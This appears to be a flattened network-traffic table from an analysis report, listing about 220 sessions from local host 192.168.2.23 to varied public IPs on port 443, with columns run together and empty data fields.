                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13040192.168.2.2339402210.189.100.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13041192.168.2.235933492.143.5.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13042192.168.2.2353664103.35.40.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13043192.168.2.2346172197.12.46.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13044192.168.2.2346760137.77.54.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13045192.168.2.233451296.188.231.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13046192.168.2.2335270124.107.131.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13047192.168.2.235943883.81.86.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13048192.168.2.2340832120.34.149.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13049192.168.2.2345960151.66.82.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13050192.168.2.235232641.255.96.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13051192.168.2.2338360223.248.132.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13052192.168.2.2347116129.70.185.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13053192.168.2.2335330186.91.187.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13054192.168.2.235142658.158.60.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13055192.168.2.2345328173.41.86.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13056192.168.2.2345552109.240.171.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13057192.168.2.235908871.148.156.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13058192.168.2.2353916193.13.97.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13059192.168.2.2335438218.42.181.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13060192.168.2.2356112156.132.73.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13061192.168.2.2334874209.206.240.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13062192.168.2.2347192138.217.66.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13063192.168.2.2347594112.167.118.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13064192.168.2.234549620.45.122.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13065192.168.2.2351444166.150.86.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13066192.168.2.2351064194.164.11.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13067192.168.2.235130864.252.45.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13068192.168.2.2350592103.219.100.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13069192.168.2.235269849.118.27.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13070192.168.2.2342776179.199.93.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13071192.168.2.234979081.143.57.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13072192.168.2.233705854.119.234.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13073192.168.2.235981457.179.156.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13074192.168.2.23484501.12.147.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13075192.168.2.235222637.18.149.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13076192.168.2.234254236.134.72.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13077192.168.2.235954287.7.36.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13078192.168.2.2356550205.71.56.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13079192.168.2.236051673.100.204.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13080192.168.2.2356948107.96.60.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13081192.168.2.2359836169.244.164.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13082192.168.2.2360100135.221.203.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13083192.168.2.233582674.50.254.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13084192.168.2.234108094.92.140.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13085192.168.2.2354410205.237.192.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13086192.168.2.235329892.87.77.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13087192.168.2.2334392172.224.45.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13088192.168.2.233789686.60.30.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13089192.168.2.2350460171.42.0.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13090192.168.2.2340180117.99.198.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13091192.168.2.2337392143.116.188.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13092192.168.2.236087890.65.16.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13093192.168.2.23414048.204.197.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13094192.168.2.234054068.139.170.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13095192.168.2.2342452130.49.222.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13096192.168.2.2338220178.80.196.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13097192.168.2.2342658185.9.104.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13098192.168.2.2358312150.237.235.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13099192.168.2.233422413.203.36.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13100192.168.2.2357016176.39.160.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13101192.168.2.23335022.46.139.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13102192.168.2.233515288.185.99.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13103192.168.2.2333968157.128.25.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13104192.168.2.235205094.76.55.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13105192.168.2.235532664.231.237.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13106192.168.2.23566341.254.207.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13107192.168.2.2348108183.239.205.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13108192.168.2.2358066221.116.157.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13109192.168.2.2354530206.41.104.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13110192.168.2.2339426174.31.241.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13111192.168.2.235497497.45.142.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13112192.168.2.233286670.213.79.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13113192.168.2.2347608146.186.230.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13114192.168.2.2345178165.237.107.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13115192.168.2.2350678148.168.253.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13116192.168.2.233814294.213.7.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13117192.168.2.235135277.102.116.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13118192.168.2.235458827.91.202.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13119192.168.2.2348804128.98.13.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13120192.168.2.2359616201.235.232.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13121192.168.2.2352716100.58.96.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13122192.168.2.2342574182.196.253.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13123192.168.2.2353528171.181.207.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13124192.168.2.234036293.255.33.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13125192.168.2.234336434.56.6.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13126192.168.2.234792448.54.200.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13127192.168.2.235176087.234.114.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13128192.168.2.235397677.96.185.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13129192.168.2.235092681.216.239.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13130192.168.2.235120835.115.124.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13131192.168.2.233443067.16.6.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13132192.168.2.2357810187.69.94.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13133192.168.2.234735485.113.56.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13134192.168.2.233898218.58.123.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13135192.168.2.235090223.82.145.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13136192.168.2.2355896163.3.102.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13137192.168.2.2338386219.20.15.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13138192.168.2.2332978166.159.40.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13139192.168.2.2354324179.106.239.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13140192.168.2.2353604150.216.213.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13141192.168.2.2355730208.247.178.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13142192.168.2.2345950213.27.232.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13143192.168.2.2350682181.66.52.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13144192.168.2.235527868.154.8.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13145192.168.2.2350912158.64.133.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13146192.168.2.23584102.100.222.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13147192.168.2.2360152143.228.21.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13148192.168.2.2343368195.178.173.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13149192.168.2.233721620.139.5.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13150192.168.2.2351184199.82.20.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13151192.168.2.2349096154.158.79.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13152192.168.2.2333370194.196.217.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13153192.168.2.2346174110.89.244.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13154192.168.2.2359672144.160.220.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13155192.168.2.2348478196.210.174.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13156192.168.2.2355412102.163.238.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13157192.168.2.235027097.193.113.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13158192.168.2.2346096206.6.176.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13159192.168.2.2333996157.21.16.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13160192.168.2.2336828222.29.126.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13161192.168.2.233346613.159.112.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13162192.168.2.2355882111.103.191.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13163192.168.2.2336892152.213.171.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13164192.168.2.2359564116.96.80.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13165192.168.2.2345324121.92.212.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13166192.168.2.2352698159.19.199.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13167192.168.2.2348826181.17.251.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13168192.168.2.2338838112.180.188.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13169192.168.2.23513348.13.110.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13170192.168.2.2356464193.110.36.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13171192.168.2.2343740176.209.12.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13172192.168.2.233836667.50.208.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13173192.168.2.233522068.173.238.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13174192.168.2.234786012.47.149.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13175192.168.2.233888493.5.45.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13176192.168.2.234510251.44.227.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13177192.168.2.2354292216.211.83.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13178192.168.2.2341704116.98.144.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13179192.168.2.2344658157.239.68.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13180192.168.2.236009072.107.76.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13181192.168.2.2345838131.78.0.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13182192.168.2.235248447.207.99.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13183192.168.2.235480297.199.185.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13184192.168.2.2335328117.17.120.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13185192.168.2.2342472112.65.86.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13186192.168.2.2352138186.168.79.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13187192.168.2.2352562129.193.17.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13188192.168.2.233719073.225.44.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13189192.168.2.2356026154.14.121.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13190192.168.2.235568240.242.50.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13191192.168.2.235862097.102.21.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192192.168.2.2345918193.169.224.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13193192.168.2.2335338174.2.66.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13194192.168.2.2338230181.98.74.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13195192.168.2.2352342116.106.100.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13196192.168.2.2345100142.247.232.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13197192.168.2.2351536112.9.221.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13198192.168.2.2337846124.17.99.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13199192.168.2.2336826121.134.104.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13200192.168.2.235676242.118.73.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13201192.168.2.2346912137.56.229.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13202192.168.2.235987012.177.187.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13203192.168.2.2353546185.134.240.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13204192.168.2.2354938218.139.22.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13205192.168.2.2334426129.42.157.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13206192.168.2.2337968192.75.142.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13207192.168.2.2353330207.107.50.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13208192.168.2.234185832.34.79.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13209192.168.2.235382880.196.3.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13210192.168.2.23476721.79.215.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13211192.168.2.2349536188.38.108.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13212192.168.2.235350052.237.62.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13213192.168.2.2333890156.99.21.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13214192.168.2.2340378201.122.15.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13215192.168.2.2343876102.191.214.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13216192.168.2.2345490185.144.152.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13217192.168.2.2360496119.206.199.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13218192.168.2.235288450.218.139.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13219192.168.2.2347920210.49.209.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13220192.168.2.2358130201.186.56.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13221192.168.2.2349196144.255.20.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13222192.168.2.235557680.180.59.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13223192.168.2.235405488.60.191.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13224192.168.2.2339496158.36.137.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13225192.168.2.234135669.244.132.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13226192.168.2.235644488.12.51.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13227192.168.2.2339028131.39.122.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13228192.168.2.2344844165.130.37.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13229192.168.2.236001635.74.209.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13230192.168.2.2357172174.220.3.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13231192.168.2.234118680.66.80.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13232192.168.2.2343312110.242.120.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13233192.168.2.2356170193.220.53.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13234192.168.2.2354972104.162.99.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13235192.168.2.234425281.25.99.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13236192.168.2.2350284193.51.225.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13237192.168.2.2346638129.227.204.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13238192.168.2.2346538161.197.90.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13239192.168.2.2343194171.5.246.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13240192.168.2.2337402163.65.210.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13241192.168.2.2357454196.226.125.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13242192.168.2.235887840.3.198.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13243192.168.2.233422492.208.65.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13244192.168.2.2357276221.38.92.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13245192.168.2.2333146112.59.220.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13246192.168.2.2350722100.0.230.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13247192.168.2.2335010221.163.2.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13248192.168.2.2343246203.110.134.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13249192.168.2.2333696198.183.27.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13250192.168.2.233457498.73.20.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13251192.168.2.234358691.39.49.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13252192.168.2.2334502188.65.46.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13253192.168.2.2343884203.82.159.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13254192.168.2.234070657.164.53.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13255192.168.2.2351300129.110.194.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13256192.168.2.2340970118.203.117.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13257192.168.2.233554266.229.229.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13258192.168.2.2357588202.246.120.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13259192.168.2.2349356139.192.167.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13260192.168.2.2346130204.252.129.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
